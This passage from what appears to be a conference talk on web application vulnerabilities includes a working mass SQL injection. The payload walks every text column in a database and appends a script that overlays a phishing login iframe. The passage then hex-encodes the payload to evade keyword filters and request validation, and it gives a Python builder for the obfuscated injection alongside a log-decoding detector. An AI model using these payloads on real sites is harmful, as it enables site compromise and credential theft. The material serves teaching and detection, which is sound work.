'DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor'
```
-- 3. We cast the query string to VARBINARY to obfuscate it. The whole statement becomes one hex literal (starting 0x4445434C... for "DECL"), so neither the SQL keywords nor the <script> tag appear in the request, and keyword-based input filters (ASP.NET Request Validation included) see nothing to block.
```sql
SELECT CAST('DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor' AS VARBINARY(MAX))
-- result: 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
```
-- 4. The final attack, sent through the vulnerable parameter. The only SQL words left in the clear are DECLARE, CAST and EXEC:
```sql
a' OR 1=1; DECLARE @S CHAR(4000);SET @S = CAST(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 as CHAR(4000));EXEC(@S)--
```
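An added example, not from the deck, that reproduces steps 3 and 4 in Python on a much shorter constructed payload (one UPDATE that appends an iframe, instead of the cursor loop) and then does what a defender wants on the other side: pull any `CAST(0x… AS CHAR)` literal out of a request log line, decode it, and report the SQL and markup it hides. Both the payload and the IIS-style log line are constructed; the only thing taken from the slide is the phishing URL.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Constructed stand-in for the slide's payload: the script-appending idea reduced to one UPDATE
INNER_SQL = ("UPDATE Comments SET Body = Body + "
             "'<iframe src=\"http://codecamp.local/EvilSite/Login.aspx\"></iframe>'")


def hex_cast_payload(sql):
    """Step 3 of the slide: what SELECT CAST('...' AS VARBINARY(MAX)) returns for a varchar string."""
    return "0x" + sql.encode("latin-1").hex().upper()


def final_injection(sql):
    """Step 4 of the slide: only DECLARE, CAST and EXEC remain readable."""
    return ("a' OR 1=1; DECLARE @S CHAR(4000);SET @S = CAST("
            + hex_cast_payload(sql) + " as CHAR(4000));EXEC(@S)--")


def decode_hex_literal(hex_literal):
    """Reverse the cast. An N'...' (nvarchar) source comes out as UTF-16LE,
    recognisable by the NUL in the second byte; plain varchar is single-byte."""
    raw = bytes.fromhex(hex_literal[2:])
    if len(raw) >= 2 and raw[1:2] == b"\x00":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


HEX_LITERAL = re.compile(r"CAST\((0x[0-9A-Fa-f]+)\s+as\s+(?:N?CHAR|N?VARCHAR)", re.IGNORECASE)
SUSPICIOUS = re.compile(
    r"<script|<iframe|\bexec\s*\(|\bupdate\b.*\bset\b|\bdrop\s+table\b|\bxp_cmdshell\b",
    re.IGNORECASE)


def scan_log_line(line):
    """Decode every hex CAST literal in a (URL-encoded) request line and return
    the decoded texts that contain SQL or markup nobody should be sending."""
    findings = []
    for m in HEX_LITERAL.finditer(unquote_plus(line)):
        decoded = decode_hex_literal(m.group(1))
        if SUSPICIOUS.search(decoded):
            findings.append(decoded)
    return findings


# Constructed IIS-style log lines: one carrying the injection, one clean
LOG_LINE = ("2013-05-18 10:22:41 GET /Products CategoryId="
            + quote_plus(final_injection(INNER_SQL)) + " 200 Mozilla/5.0")
CLEAN_LINE = "2013-05-18 10:22:42 GET /Products CategoryId=7 200 Mozilla/5.0"

if __name__ == "__main__":
    print(final_injection(INNER_SQL))
    for hit in scan_log_line(LOG_LINE):
        print("decoded:", hit)
```

Run over real logs this will also decode legitimate hex casts, so the SUSPICIOUS patterns, not the presence of a cast, should drive the alert. The same decoder applies to `CHAR(65)+CHAR(66)...` concatenations and to `EXEC(@S)` with `@S` assembled from several pieces; the common thread is that a filter looking for keywords in the raw request sees nothing, while a detector that decodes first sees everything.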
![Page 43: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/43.jpg)
Questions?
![Page 44: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/44.jpg)
Complete the electronic evaluation forms on the computers in the hall and enter to win!
– Infragistics Ultimate
– Telerik DevCraft
– JetBrains .NET tools
– Semos training vouchers
– Pluralsight subscriptions
– and many more…
![Page 45: Top web apps security vulnerabilities](https://reader036.vdocuments.net/reader036/viewer/2022062412/58a3e8d61a28ab272e8b4f85/html5/thumbnails/45.jpg)